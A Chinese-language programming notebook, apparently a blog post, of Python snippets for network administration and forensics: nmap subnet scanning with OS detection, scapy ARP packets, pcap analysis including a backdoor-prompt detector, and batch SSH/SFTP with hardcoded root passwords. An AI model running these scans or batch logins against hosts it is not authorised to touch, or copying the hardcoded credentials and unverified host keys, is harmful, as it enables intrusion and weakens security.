作者編寫的一些代碼片段,本版本為殘廢刪減版,沒有加入多線程,也沒有實現任何有價值的功能,只是一個臨時記事本,記錄下本人編寫代碼的一些思路,有價值的完整版就不發出來了,自己組織吧,代碼沒啥技術含量,畢竟Python這一塊沒怎么認真研究過,代碼也都是隨性瞎寫的,大佬不要噴我,將就着看吧。
廢話不啰嗦,開始上代碼,第一種是無參數的簡單實現方式.
import sys
def handle_option(argv):
    """Interpret a single ``-option`` style command-line argument.

    Args:
        argv: Full argument vector; ``argv[0]`` is the program name.

    Returns:
        The message printed for a recognised option, or ``None`` when
        ``argv[1]`` does not start with ``-``.

    Raises:
        SystemExit: If no argument was given or the option is unknown.
    """
    if len(argv) < 2:
        print("沒有輸入任何參數")
        sys.exit()
    if not argv[1].startswith("-"):
        return None
    messages = {"version": "版本信息", "help": "幫助菜單"}
    option = argv[1][1:]
    if option not in messages:
        print("異常")
        sys.exit()
    print(messages[option])
    return messages[option]


if __name__ == "__main__":
    handle_option(sys.argv)
我們還可以編寫一個交互式的Shell環境,這樣能更加靈活的操作命令,操作方式 [shell] # ls
# coding:utf-8
import os
def add(x, y):
    """Print and return ``x + y``.

    Shell arguments arrive as strings, so ``add 1 2`` concatenates to ``12``.
    """
    result = x + y
    print("兩數相連", result)
    return result


def clear():
    """Clear the terminal with the platform's own command."""
    os.system("cls" if os.name == "nt" else "clear")


def main():
    """Run a tiny interactive shell offering ``add``, ``clear`` and ``exit``."""
    while True:
        try:
            cmd = input("[Shell] # ").split()
        except (EOFError, KeyboardInterrupt):
            # A closed stdin used to be swallowed and retried forever.
            print()
            return
        if not cmd:
            # split() yields a list, so the old comparison with "" never matched.
            continue
        name, args = cmd[0], cmd[1:]
        if name == "exit":
            raise SystemExit(1)
        elif name == "clear":
            clear()
        elif name == "add":
            if len(args) >= 2:
                add(args[0], args[1])
            else:
                print("add 參數不正確,至少傳遞2個參數")
        else:
            print("沒有找到這個命令")


if __name__ == '__main__':
    main()
也可以使用內置庫實現交互命令,do_xxxx()
import os
import sys
from cmd import Cmd
class BingCmd(Cmd):
    """Small interactive shell built on :class:`cmd.Cmd`.

    Each ``do_<name>`` method implements the ``<name>`` command and each
    ``help_<name>`` method supplies its help text.
    """

    prompt = "[Shell] #"

    def preloop(self):
        """Print a banner once before the first prompt."""
        print("hello world")

    def do_bing(self, argv):
        """Echo the arguments and switch this shell's prompt to ``bing >``."""
        print("參數傳遞: {}".format(argv))
        # Assign on the instance; the former bare local had no effect.
        self.prompt = "bing >"

    def help_bing(self):
        print("bing 函數的幫助信息")

    def emptyline(self):
        print("當輸入空行時調用該方法")

    def default(self, line):
        print("無法識別輸入的command時調用該方法")

    def do_exit(self, argv=""):
        """Leave the command loop.

        ``Cmd`` always passes the argument string, so the parameter must
        exist; a true return value tells ``cmdloop`` to stop.
        """
        return True


if __name__ == "__main__":
    BingCmd().cmdloop()
如果需要編寫一些相對大型的項目,則需要使用類來開發,以下代碼用類實現的命令行傳遞.
'''http://patorjk.com/software/taag'''
#coding:utf-8
import optparse
class MyClass:
    """Command-line front end that collects a server address and a port."""

    def __init__(self, argv=None):
        """Parse the command line.

        Args:
            argv: Argument list to parse; ``None`` (the default) lets
                optparse read ``sys.argv[1:]``.
        """
        usage = ''' 123'''
        self.parser = optparse.OptionParser(usage=usage)
        self.parser.add_option("-s", "--server", type="string", dest="server", help="you server IP")
        self.parser.add_option("-p", "--port", type="int", dest="port", help="you server port")
        self.options, self.args = self.parser.parse_args(argv)

    def check(self):
        """Print the help text and exit unless both server and port were given."""
        if not self.options.server or not self.options.port:
            self.parser.print_help()
            raise SystemExit()

    def fuck(self, ip, port):
        """Placeholder action: print the received ``ip`` and ``port`` 100 times."""
        try:
            print("接收到參數列表,准備執行功能!")
            for _ in range(0, 100):
                print(ip, port)
        except Exception:
            print("[ - ] Not Generate !")


if __name__ == '__main__':
    opt = MyClass()
    opt.check()
    ip = opt.options.server
    port = opt.options.port
    # Missing options are None, never the string "None".
    if ip is not None and port is not None:
        opt.fuck(ip, port)

構造一個數據包
from scapy.all import Ether
from scapy.all import ARP
from scapy.all import srp
# Ethernet layer addressed to the broadcast MAC.
ether = Ether(src="00:00:00:00:00:00", dst="FF:FF:FF:FF:FF:FF")
# ARP layer with op=1, sender 192.168.1.2 and target 255.255.255.255.
arp = ARP(
    op=1,
    hwsrc="00:00:00:00:00:00",
    hwdst="FF:FF:FF:FF:FF:FF",
    psrc="192.168.1.2",
    pdst="255.255.255.255",
)
# Stack both layers into one packet, then send it and wait up to 3 s.
send = ether / arp
res = srp(send, timeout=3, verbose=0)
nmap 提取關鍵數據
import numpy as np
from pylab import *
import nmap
# Create the python-nmap scanner object used by the transcript that follows.
n=nmap.PortScanner()
# Scan 192.168.1.0/24, passing "-O" through as the nmap arguments.
ret = n.scan(hosts="192.168.1.0/24",arguments="-O")
#print(n["192.168.1.20"]['addresses']['ipv4'])
# Dump the complete result returned by scan().
print(ret)
ret["nmap"]["command_line"]
"nmap -O 192.168.1.20"
>>> ret["nmap"]["scanstats"]["timestr"]
'Thu Mar 19 19:20:08 2020'
>>> ret["nmap"]["scanstats"]["uphosts"]
'4'
>>> ret["nmap"]["scanstats"]["totalhosts"]
'256'
>>> n.all_hosts()
['192.168.1.1', '192.168.1.10', '192.168.1.2', '192.168.1.20']
>>> ret["scan"]["192.168.1.20"]["addresses"]
{'ipv4': '192.168.1.20', 'mac': '00:50:56:22:6F:D3'}
>>> ret["scan"]["192.168.1.20"]["addresses"]["ipv4"]
'192.168.1.20'
>>> ret["scan"]["192.168.1.20"]["addresses"]["mac"]
'00:50:56:22:6F:D3'
>>> ret["scan"]["192.168.1.20"]["tcp"].keys()
dict_keys([21, 22, 80, 139, 445, 3306])
>>> ret["scan"]["192.168.1.20"]["osmatch"][0]["name"]
'Linux 3.2 - 4.9'
>>> ret["scan"]["192.168.1.10"]["vendor"].values()[0]
'Elitegroup Computer System CO.'
def aaa():
    """Show a pie chart of sample operating-system counts."""
    # Select a font by name so the non-ASCII label can be drawn.
    mpl.rcParams['font.sans-serif'] = ['KaiTi']
    label = "windows xp", "windows 7", "Windows 8", "Linux 4", "Centos 6", "Huawei交換機"
    fracs = [1, 2, 3, 4, 5, 1]
    plt.axes(aspect=1)
    plt.pie(x=fracs, labels=label, autopct="%0d%%")
    plt.show()
nmap 搞事情,統計結果
import os,sys
number = [80, 8080, 3306, 3389, 1433, 1433, 1433]
list_num = set(number)
# Map each distinct port to its number of occurrences (kept as a string).
flag = {item: str(number.count(item)) for item in list_num}
print(flag)
--------------------------------------------------------------------------
>>> Nmap.all_hosts()
['192.168.1.1', '192.168.1.10', '192.168.1.2', '192.168.1.20']
>>> ret["scan"]["192.168.1.1"]["tcp"].keys()
dict_keys([80, 1900])
>>> for item in Nmap.all_hosts():
... ret["scan"][item]["tcp"].keys()
...
dict_keys([80, 1900])
dict_keys([100, 135, 139, 443, 902, 912, 1433, 2869, 3389])
dict_keys([135, 139, 445, 5357])
a = dict_keys([21, 22, 80, 139, 445, 3306])
list(a)
--------------------------------------------------------------------------
import os
import nmap
def ScanPort(hosts="192.168.1.0/24", arguments="-PS"):
    """Scan hosts with nmap and count how many list common service ports.

    Args:
        hosts: Target specification handed to ``PortScanner.scan``.
        arguments: Extra nmap command-line arguments.

    Returns:
        Dict mapping service name to the number of hosts whose TCP result
        contains that service's port; the dict is also printed.
    """
    services = {"WebServer": 80, "MySQL": 3306, "SSH": 22, "MSSQL": 1433}
    Nmap = nmap.PortScanner()
    ret = Nmap.scan(hosts=hosts, arguments=arguments)
    port = []
    for item in Nmap.all_hosts():
        # A host without TCP results has no "tcp" key at all.
        port.extend(ret["scan"][item].get("tcp", {}).keys())
    # count() yields 0 for an unseen port, where flag.get() used to yield None.
    dic = {name: port.count(number) for name, number in services.items()}
    print(dic)
    return dic


if __name__ == "__main__":
    ScanPort()
C:\Users\LyShark\Desktop>python main.py
{55555, 3, 902, 135, 139, 9102, 912, 21, 22, 1433, 1062, 425, 2601, 14000, 55600, 2869, 443, 3389, 445, 3905, 1352, 8654, 80, 82, 212, 100, 616, 3306, 1900, 5357}
{'WebServer': 3, 'MySQL': 1, 'SSH': 1, 'MSSQL': 0}
nmap 看圖識字,頻繁掃描會出現崩潰的情況,解決辦法是異常處理。
import os,nmap
import numpy as np
from matplotlib.pylab import *
# pip install numpy matplotlib -i https://pypi.tuna.tsinghua.edu.cn/simple
def ScanPort(hosts="192.168.1.0/24", arguments="-PS"):
    """Scan hosts with nmap, count common service ports and chart the result.

    Args:
        hosts: Target specification handed to ``PortScanner.scan``.
        arguments: Extra nmap command-line arguments.

    Returns:
        Dict mapping service name to the number of hosts whose TCP result
        contains that service's port. The dict is printed and, when at
        least one count is non-zero, saved as a pie chart in ``port.png``.
    """
    services = {"WebServer": 80, "MySQL": 3306, "SSH": 22, "MSSQL": 1433}
    Nmap = nmap.PortScanner()
    ret = Nmap.scan(hosts=hosts, arguments=arguments)
    port = []
    for item in Nmap.all_hosts():
        # A host without TCP results has no "tcp" key at all.
        port.extend(ret["scan"][item].get("tcp", {}).keys())
    # count() yields 0 for an unseen port, where flag.get() used to yield None.
    dic = {name: port.count(number) for name, number in services.items()}
    print(dic)
    if any(dic.values()):
        # A pie chart cannot be drawn from all-zero data.
        mpl.rcParams['font.sans-serif'] = ['KaiTi']
        label = list(dic.keys())
        fracs = list(dic.values())
        plt.axes(aspect=1)
        plt.pie(x=fracs, labels=label, autopct="%0d%%")
        plt.savefig('port.png')
    return dic


if __name__ == "__main__":
    ScanPort()


dpkt 流量解包: 使用 dpkt 對抓取到的數據包進行解包
import dpkt
import socket
import geoip2.database
import argparse
import re

# NOTE(review): ``data`` must already hold one raw Ethernet frame; nothing in
# this snippet defines it.
p = dpkt.ethernet.Ethernet(data)
if isinstance(p.data, dpkt.ip.IP) and isinstance(p.data.data, dpkt.tcp.TCP):
    # A port cannot be 80 and 443 at once, so the old test never matched.
    if p.data.data.dport in (80, 443):
        data = p.data.data.data
        if b'www.com' in data:
            recv = re.findall(b'[1-9][0-9]{4,}', data)
            if len(recv):
                print('{}'.format(bytes.decode(recv[0]).replace('o_cookie=', '')))
def GetPcap(pcap):
    """Collect the distinct IPv4 destination addresses found in a capture.

    Args:
        pcap: Iterable of ``(timestamp, raw_frame)`` pairs, e.g. a
            ``dpkt.pcap.Reader``.

    Returns:
        Set of dotted-quad destination address strings.
    """
    destinations = set()
    for _timestamp, packet in pcap:
        try:
            ip = dpkt.ethernet.Ethernet(packet).data
            # The source is still decoded so frames with a bad source are skipped.
            socket.inet_ntoa(ip.src)
            destinations.add(socket.inet_ntoa(ip.dst))
        except (dpkt.dpkt.UnpackError, AttributeError, OSError, TypeError, ValueError):
            # Frame is truncated or does not carry an IPv4 header.
            continue
    return destinations

公開一個定位工具 這里只公開一個基礎版的地址查詢工具,完整版不便公開。
import dpkt
import socket
import geoip2.database
import argparse
def GetPcap(pcap):
    """Collect the distinct IPv4 destination addresses found in a capture.

    Args:
        pcap: Iterable of ``(timestamp, raw_frame)`` pairs, e.g. a
            ``dpkt.pcap.Reader``.

    Returns:
        Set of dotted-quad destination address strings.
    """
    destinations = set()
    for _timestamp, packet in pcap:
        try:
            ip = dpkt.ethernet.Ethernet(packet).data
            # The source is still decoded so frames with a bad source are skipped.
            socket.inet_ntoa(ip.src)
            destinations.add(socket.inet_ntoa(ip.dst))
        except (dpkt.dpkt.UnpackError, AttributeError, OSError, TypeError, ValueError):
            # Frame is truncated or does not carry an IPv4 header.
            continue
    return destinations
def retKML(addr, longitude, latitude):
    """Build one KML ``<Placemark>`` element.

    Args:
        addr: Label for the placemark; XML-escaped before insertion.
        longitude: Longitude as a number.
        latitude: Latitude as a number.

    Returns:
        The placemark markup, with coordinates written in
        ``longitude,latitude`` order.
    """
    from xml.sax.saxutils import escape

    kml = (
        '<Placemark>\n'
        '<name>%s</name>\n'
        '<Point>\n'
        '<coordinates>%6f,%6f</coordinates>\n'
        '</Point>\n'
        '</Placemark>\n'
    ) % (escape(str(addr)), longitude, latitude)
    return kml
if __name__ == '__main__':
    # Usage: main.py -p data.pcap -d GeoLite2-City.mmdb  (geolocate the IPs in a capture)
    import geoip2.errors

    parser = argparse.ArgumentParser()
    parser.add_argument("-p", "--pcap", dest="pcap_file", help="set -p *.pcap")
    parser.add_argument("-d", "--mmdb", dest="mmdb_file", help="set -d *.mmdb")
    args = parser.parse_args()
    if args.pcap_file and args.mmdb_file:
        with open(args.pcap_file, 'rb') as fp:
            addr = GetPcap(dpkt.pcap.Reader(fp))
        kmlheader = (
            '<?xml version="1.0" encoding="UTF-8"?>'
            '\n<kml xmlns="http://www.opengis.net/kml/2.2">\n<Document>\n'
        )
        kmlfooter = '</Document>\n</kml>\n'
        reader = geoip2.database.Reader(args.mmdb_file)
        try:
            # The output is opened once instead of being reopened per address.
            with open("GoogleEarth.kml", "w", encoding="utf-8") as f:
                f.write(kmlheader)
                for item in addr:
                    try:
                        response = reader.city(item)
                    except (geoip2.errors.AddressNotFoundError, ValueError):
                        # Address is not in the database; skip it.
                        continue
                    print("IP地址: %-16s --> " % item, end="")
                    print("網段: %-16s --> " % response.traits.network, end="")
                    print("地區: {}".format(
                        response.country.names.get("zh-CN", response.country.name)), end="\n")
                    longitude = response.location.longitude
                    latitude = response.location.latitude
                    if longitude is None or latitude is None:
                        continue
                    # retKML expects longitude first; the old call passed latitude first.
                    f.write(retKML(item, longitude, latitude))
                f.write(kmlfooter)
        finally:
            reader.close()
    else:
        parser.print_help()

默認會生成 GoogleEarth.kml 文件,你可以將其導入谷歌地球

檢測URL中的敏感路徑 FindPcapWord可用於檢測URL中是否存在敏感字
def FindPcapWord(pcap, WordKey):
    """Report HTTP GET requests whose URI contains ``WordKey``.

    Args:
        pcap: Iterable of ``(timestamp, raw_frame)`` pairs, e.g. a
            ``dpkt.pcap.Reader``.
        WordKey: Substring to look for; matched case-insensitively.
    """
    # The URI is lowercased below, so the keyword must be lowercased as well.
    needle = WordKey.lower()
    for _timestamp, packet in pcap:
        try:
            ip = dpkt.ethernet.Ethernet(packet).data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            http = dpkt.http.Request(ip.data.data)
        except (dpkt.dpkt.UnpackError, AttributeError, OSError, TypeError, ValueError):
            # Frame does not carry a parsable HTTP request over IPv4.
            continue
        if http.method == "GET":
            uri = http.uri.lower()
            if needle in uri:
                print("[+] 源地址: {} --> 目標地址: {} 檢索到URL中存在 {}".format(src, dst, uri))
FindHivemind 檢測數據包中是否存在敏感字符
def FindHivemind(pcap, target="125.39.247.226", port=80, marker=b'[cmd]# '):
    """Report packets sent to ``target:port`` whose payload contains ``marker``.

    Args:
        pcap: Iterable of ``(timestamp, raw_frame)`` pairs.
        target: Destination IPv4 address to watch.
        port: Destination port to watch.
        marker: Byte string searched for in the lowercased payload; a
            clear-text command prompt suggests a possible backdoor.
    """
    for _timestamp, packet in pcap:
        try:
            ip = dpkt.ethernet.Ethernet(packet).data
            tcp = ip.data
            dst = socket.inet_ntoa(ip.dst)
            dport = tcp.dport
            payload = tcp.data.lower()
        except (dpkt.dpkt.UnpackError, AttributeError, OSError, TypeError, ValueError):
            continue
        if dport == port and dst == target:
            # The payload is bytes; testing a str against it raised TypeError.
            if marker in payload:
                print("[+] {}:{}".format(dst, dport))
dpkt 檢測網絡流量合法性: 通常配合WireShark抓取網絡數據包,然后配合dpkt解包工具對流量進行分析,常用於網絡取證.
def FindPcapWord(pcap, WordKey):
    """Report HTTP GET requests whose URI contains ``WordKey``.

    Args:
        pcap: Iterable of ``(timestamp, raw_frame)`` pairs, e.g. a
            ``dpkt.pcap.Reader``.
        WordKey: Substring to look for; matched case-insensitively.
    """
    # The URI is lowercased below, so the keyword must be lowercased as well.
    needle = WordKey.lower()
    for _timestamp, packet in pcap:
        try:
            ip = dpkt.ethernet.Ethernet(packet).data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            http = dpkt.http.Request(ip.data.data)
        except (dpkt.dpkt.UnpackError, AttributeError, OSError, TypeError, ValueError):
            # Frame does not carry a parsable HTTP request over IPv4.
            continue
        if http.method == "GET":
            uri = http.uri.lower()
            if needle in uri:
                print("[+] 源地址: {} --> 目標地址: {} 檢索到URL中存在 {}".format(src, dst, uri))
def FindHivemind(pcap, target="125.39.247.226", port=80, marker=b'[cmd]# '):
    """Report packets sent to ``target:port`` whose payload contains ``marker``.

    Args:
        pcap: Iterable of ``(timestamp, raw_frame)`` pairs.
        target: Destination IPv4 address to watch.
        port: Destination port to watch.
        marker: Byte string searched for in the lowercased payload; a
            clear-text command prompt suggests a possible backdoor.
    """
    for _timestamp, packet in pcap:
        try:
            ip = dpkt.ethernet.Ethernet(packet).data
            tcp = ip.data
            dst = socket.inet_ntoa(ip.dst)
            dport = tcp.dport
            payload = tcp.data.lower()
        except (dpkt.dpkt.UnpackError, AttributeError, OSError, TypeError, ValueError):
            continue
        if dport == port and dst == target:
            # The payload is bytes; testing a str against it raised TypeError.
            if marker in payload:
                print("[+] {}:{}".format(dst, dport))
def FindDDosAttack(pcap, threshold=500, port=80):
    """Flag source/destination pairs that send many packets to one port.

    Args:
        pcap: Iterable of ``(timestamp, raw_frame)`` pairs.
        threshold: A pair is reported once its packet count exceeds this.
        port: Destination port being counted.

    Returns:
        Mapping of ``(src, dst)`` to packet count for every pair seen on
        ``port``; pairs above ``threshold`` are also printed.
    """
    from collections import Counter

    pktCount = Counter()
    for _timestamp, packet in pcap:
        try:
            ip = dpkt.ethernet.Ethernet(packet).data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            # The old code tested an undefined ``dport`` and so counted nothing.
            dport = ip.data.dport
        except (dpkt.dpkt.UnpackError, AttributeError, OSError, TypeError, ValueError):
            continue
        if dport == port:
            pktCount[(src, dst)] += 1
    for (src, dst), pktSent in pktCount.items():
        if pktSent > threshold:
            print("[+] 源地址: {} 攻擊: {} 流量: {} pkts.".format(src, dst, str(pktSent)))
    return pktCount


if __name__ == "__main__":
    with open("D://data.pcap", "rb") as fp:
        pcap = dpkt.pcap.Reader(fp)
        FindPcapWord(pcap, "wang.zip")
簡單實現批量執行SSH命令:
import os,paramiko
ssh = paramiko.SSHClient()
# NOTE(review): AutoAddPolicy accepts unknown host keys without verification.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())


def BatchCMD(address, username, password, port, command):
    """Run ``command`` on one host over SSH and report the outcome.

    Args:
        address: Host name or IP address.
        username: Login name.
        password: Login password.
        port: SSH port; a numeric string is accepted.
        command: Shell command to execute remotely.

    Returns:
        1 when the command produced output on stdout, otherwise 0.
    """
    try:
        ssh.connect(hostname=address, username=username, password=password,
                    port=int(port), timeout=2)
        stdin, stdout, stderr = ssh.exec_command(command)
        result = stdout.read()
    except (paramiko.SSHException, OSError, ValueError):
        print('\033[45mIP: {} UserName:{} Port: {} Status: Error'.format(address, username, port))
        return 0
    finally:
        # Release the connection before the next host is tried.
        ssh.close()
    if len(result) != 0:
        print('\033[0mIP: {} UserName:{} Port: {} Status: OK'.format(address, username, port))
        return 1
    print('\033[45mIP: {} UserName:{} Port: {} Status: Error'.format(address, username, port))
    return 0


if __name__ == "__main__":
    with open("ip.log", "r") as fp:
        for temp in fp:
            ip = temp.strip()
            if ip:
                BatchCMD(ip, "root", "1233", "22", "ls && echo $?")
簡單實現批量SFTP遠程傳輸:
import paramiko
def BatchSFTP(address, username, password, port, soruce, target, flag):
    """Upload or download one file over SFTP.

    Args:
        address: Host name or IP address.
        username: Login name.
        password: Login password.
        port: SSH port; a numeric string is accepted.
        soruce: Source path (local for ``PUT``, remote for ``GET``).
        target: Destination path; for ``GET`` the suffix ``_<address>`` is
            appended to it.
        flag: ``"PUT"`` to upload or ``"GET"`` to download.

    Returns:
        1 when the transfer finished, 0 when it failed or ``flag`` is
        neither ``"PUT"`` nor ``"GET"``.
    """
    transport = paramiko.Transport((address, int(port)))
    try:
        transport.connect(username=username, password=password)
        sftp = paramiko.SFTPClient.from_transport(transport)
        if flag == "GET":
            target = str(target + "_" + address)
        try:
            if flag == "PUT":
                sftp.put(soruce, target)
            elif flag == "GET":
                sftp.get(soruce, target)
            else:
                return 0
        except (OSError, paramiko.SSHException):
            print("Addr:{} UserName:{} Source:{} Target:{} Error".format(address, username, soruce, target))
            return 0
        print("Addr:{} UserName:{} Source:{} Target:{} Success".format(address, username, soruce, target))
        return 1
    finally:
        # The old close() calls sat after return statements and never ran.
        transport.close()


if __name__ == "__main__":
    # Upload the local file ./main.py to /tmp/main.py
    BatchSFTP("192.168.1.20", "root", "1233", "22", "./main.py", "/tmp/main.py", "PUT")
    # Copy /tmp/main.py from the remote host to the local path ./get/test.py_<address>
    BatchSFTP("192.168.1.20", "root", "1233", "22", "/tmp/main.py", "./get/test.py", "GET")
通過SSH模塊獲取系統內存數據 這里我寫了一個簡單的獲取內存數據的腳本,當然獲取CPU磁盤等,同樣可以這樣來搞.
import os,paramiko,re
ssh = paramiko.SSHClient()
# NOTE(review): AutoAddPolicy accepts unknown host keys without verification.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())


def SSH_Get_Mem():
    """Read selected ``/proc/meminfo`` fields from 192.168.1.20 over SSH.

    Returns:
        Dict mapping each of MemTotal, MemFree, Cached, SwapTotal and
        SwapFree that appears in the output to its integer value.
    """
    wanted = ["MemTotal", "MemFree", "Cached", "SwapTotal", "SwapFree"]
    ssh.connect(hostname="192.168.1.20", username="root", password="1233", port=22, timeout=2)
    try:
        stdin, stdout, stderr = ssh.exec_command('cat /proc/meminfo')
        # Decode the bytes properly instead of parsing their repr().
        text = stdout.read().decode("utf-8", "replace")
    finally:
        ssh.close()
    values = {}
    for line in text.splitlines():
        # Look fields up by name; fixed line numbers differ between kernels.
        key, sep, rest = line.partition(":")
        if sep and key in wanted:
            values[key] = int(rest.replace(" kB", "").strip())
    return {key: values[key] for key in wanted if key in values}


if __name__ == "__main__":
    for i in range(10):
        dic = SSH_Get_Mem()
        print(dic)
fabric的使用技巧 fabric工具也是自動化運維利器,其默認依賴於paramiko的二次封裝.
# 簡單實現命令執行
from fabric import Connection
conn = Connection(host="192.168.1.10", user="root", port="22", connect_kwargs={"password": "123"})
try:
    with conn.cd("/var/www/html/"):
        ret = conn.run("ls -lh", hide=True)
    # format() works whether the port is held as int or str; "+" needs a str.
    print("主機:{}端口:{}完成".format(conn.host, conn.port))
except Exception:
    print("主機:{}端口:{}失敗".format(conn.host, conn.port))
finally:
    conn.close()
# 讀取數據到本地
from fabric import Connection
conn = Connection(host="192.168.1.20", user="root", port="22", connect_kwargs={"password": "123"})
try:
    uname = conn.run('uname -s', hide=True)
    if 'Linux' in uname.stdout:
        # Print the fifth df column for "/" (the last output line).
        command = "df -h / | tail -n1 | awk '{print $5}'"
        print(conn.run(command, hide=True).stdout.strip())
finally:
    conn.close()
# 文件上傳與下載
from fabric import Connection
# Connection settings for root@192.168.1.20 on port 22 with password login.
conn = Connection(host="192.168.1.20",user="root",port="22",connect_kwargs={"password":"123"})
conn.put("D://zabbix_get.exe","/tmp/zabbix.exe") # upload the local file
conn.get("/tmp/zabbix.exe","./zab.exe") # download the remote file
通過SNMP收集主機CPU利用率 通過SNMP協議,收集目標主機的CPU利用率(百分比),並返回JSON字符串.
import os,re,time
def Get_CPU_Info(addr):
    """Collect the host name and CPU figures of ``addr`` via ``snmpwalk``.

    Args:
        addr: Agent address. NOTE(review): it is interpolated into a shell
            command, so only pass trusted values.

    Returns:
        Dict keyed by HostName, CoreLoad, CpuUser, CpuSystem and CpuIdle,
        or ``0`` when the output could not be obtained or parsed.
    """
    Head = ["HostName", "CoreLoad", "CpuUser", "CpuSystem", "CpuIdle"]
    oids = [" .1.3.6.1.2.1.1.5", " .1.3.6.1.2.1.25.3.3.1.2"]
    oids += [" 1.3.6.1.4.1.2021.11.{}.0".format(i) for i in [9, 10, 11]]
    try:
        CPU = []
        for oid in oids:
            # The context manager closes the pipe that used to be leaked.
            with os.popen("snmpwalk -v 2c -c nmap " + addr + oid) as ret:
                CPU.append(ret.read().split(":")[3].strip())
        return dict(zip(Head, CPU))
    except (IndexError, OSError, TypeError):
        return 0


if __name__ == '__main__':
    for i in range(100):
        dic = Get_CPU_Info("192.168.1.20")
        print(dic)
        time.sleep(1)
通過SNMP獲取系統CPU負載信息 分別獲取到系統的1,5,15分鍾的負載信息,並返回JSON格式.
import os,re,time
def Get_Load_Info(addr):
    """Collect the host name and three load values of ``addr`` via ``snmpwalk``.

    Args:
        addr: Agent address. NOTE(review): it is interpolated into a shell
            command, so only pass trusted values.

    Returns:
        Dict keyed by HostName, Load1, Load5 and Load15, or ``0`` when the
        output could not be obtained or parsed.
    """
    Head = ["HostName", "Load1", "Load5", "Load15"]
    try:
        with os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5") as ret:
            host = ret.read().split(":")[3].strip()
        with os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.4.1.2021.10.1.3") as ret:
            # Strip everything up to "STRING: " on each line, leaving the values.
            load = re.sub(".*STRING: ", "", ret.read()).split("\n")
        return dict(zip(Head, [host, load[0], load[1], load[2]]))
    except (IndexError, OSError, TypeError):
        return 0


if __name__ == '__main__':
    dic = Get_Load_Info("192.168.1.20")
    print(dic)
通過SNMP獲取系統內存占用
import os,re,time
def Get_Mem_Info(addr):
    """Collect the host name and memory figures of ``addr`` via ``snmpwalk``.

    Args:
        addr: Agent address. NOTE(review): it is interpolated into a shell
            command, so only pass trusted values.

    Returns:
        Dict keyed by HostName, memTotalSwap, memAvailSwap, memTotalReal
        and memTotalFree, or ``0`` when the output could not be obtained
        or parsed.
    """
    Head = ["HostName", "memTotalSwap", "memAvailSwap", "memTotalReal", "memTotalFree"]
    try:
        with os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5") as ret:
            SysMem = [ret.read().split(":")[3].strip()]
        with os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.4.1.2021.4") as ret:
            mem = ret.read().split("\n")
        # Output lines 2, 3, 4 and 6 supply the four memory values, in Head order.
        for i in [2, 3, 4, 6]:
            SysMem.append(re.sub(".*INTEGER: ", "", mem[i]).split(" ")[0])
        return dict(zip(Head, SysMem))
    except (IndexError, OSError, TypeError):
        return 0


if __name__ == '__main__':
    dic = Get_Mem_Info("192.168.1.20")
    print(dic)
通過SNMP獲取系統磁盤數據 這個案例並不完整,我只寫了一點,后面有個問題一直沒有解決.
import os,re,time
def Get_Disk_Info(addr):
    """Collect storage name, used and size columns of ``addr`` via ``snmpwalk``.

    Args:
        addr: Agent address. NOTE(review): it is interpolated into a shell
            command, so only pass trusted values.

    Returns:
        List of dicts with the keys Name, Used and Size, or ``0`` when the
        output could not be obtained or parsed.
    """
    tables = (("Name", "hrStorageDescr"), ("Used", "hrStorageUsed"), ("Size", "hrStorageSize"))
    try:
        columns = {}
        for field, mib in tables:
            with os.popen("snmpwalk -v 2c -c nmap " + addr + " HOST-RESOURCES-MIB::" + mib) as ret:
                columns[field] = ret.read().split("\n")
        disks = []
        for i in range(1, len(columns["Name"]) - 7):
            # Build a fresh dict per row; appending one shared dict made every
            # entry show the values of the last row.
            disks.append({field: lines[i + 5].split(":")[3] for field, lines in columns.items()})
        return disks
    except (IndexError, OSError, TypeError):
        return 0


if __name__ == '__main__':
    disks = Get_Disk_Info("192.168.1.20")
    print(disks)
將指定的日志格式寫入文件
import os,re,time
def WriteFileLog(filename, log):
    """Append ``log`` plus a newline to ``filename``, creating it if needed.

    Args:
        filename: Path of the log file.
        log: Text of one log entry.
    """
    # Append mode creates a missing file, so the first entry is written too;
    # the old code only created the file and dropped that entry.
    with open(filename, "a") as fp:
        fp.write(log + "\n")


if __name__ == "__main__":
    dic = {"admin": "123123"}
    WriteFileLog("test.log", str(dic))
計算指定范圍時間戳 通過編程實現計算出指定時間之內對應時間戳數據,用於通過時間戳定位時間區間.
import os
import sys
import time,datetime
# start = 2019-12-10 14:49:00
# end = 2019-12-10 14:50:00
def ReadLog(log, start, ends):
    """List every whole-second timestamp between two local times, inclusive.

    Args:
        log: Unused here; kept so existing calls keep working.
        start: Start time formatted as ``%Y-%m-%d %H:%M:%S``.
        ends: End time in the same format.

    Returns:
        List of integer epoch seconds from ``start`` to ``ends``; the list
        is also printed.
    """
    time_format = "%Y-%m-%d %H:%M:%S"
    start_time = int(time.mktime(time.strptime(start, time_format)))
    end_time = int(time.mktime(time.strptime(ends, time_format)))
    find_list = list(range(start_time, end_time + 1))
    print(find_list)
    return find_list


if __name__ == "__main__":
    ReadLog("./cpu.log", "2019-12-10 14:49:00", "2019-12-10 14:50:00")
通過DNSpython模塊查詢域名記錄
# pip install dnspython
import os
import dns.resolver
domain = "baidu.com"
# dnspython 2.x renamed query() to resolve(); fall back on older installs.
_resolve = getattr(dns.resolver, "resolve", None) or dns.resolver.query
A = _resolve(domain, "A")
for x in A.response.answer:
    for y in x:
        print("查詢到A記錄:{} ".format(y))
print("*" * 50)
MX = _resolve(domain, "MX")
for x in MX:
    print("MX交換數值 {} MX記錄:{} ".format(x.preference, x.exchange))
print("*" * 50)
NS = _resolve(domain, "NS")
for x in NS.response.answer:
    for y in x:
        print("NS名稱服務:{} ".format(y.to_text()))
實現兩個文件Diff差異比對 使用Python內置的模塊就可以完成兩個文件的差異比對,最后生成html報表.
import os
import difflib
def ReadFile(filename):
    """Return the lines of ``filename`` without their line endings.

    Args:
        filename: Path of the text file to read.

    Returns:
        List of lines; an empty list (after printing the error) when the
        file cannot be read, so callers always receive a list.
    """
    try:
        with open(filename, "r") as fp:
            return fp.read().splitlines()
    except IOError as error:
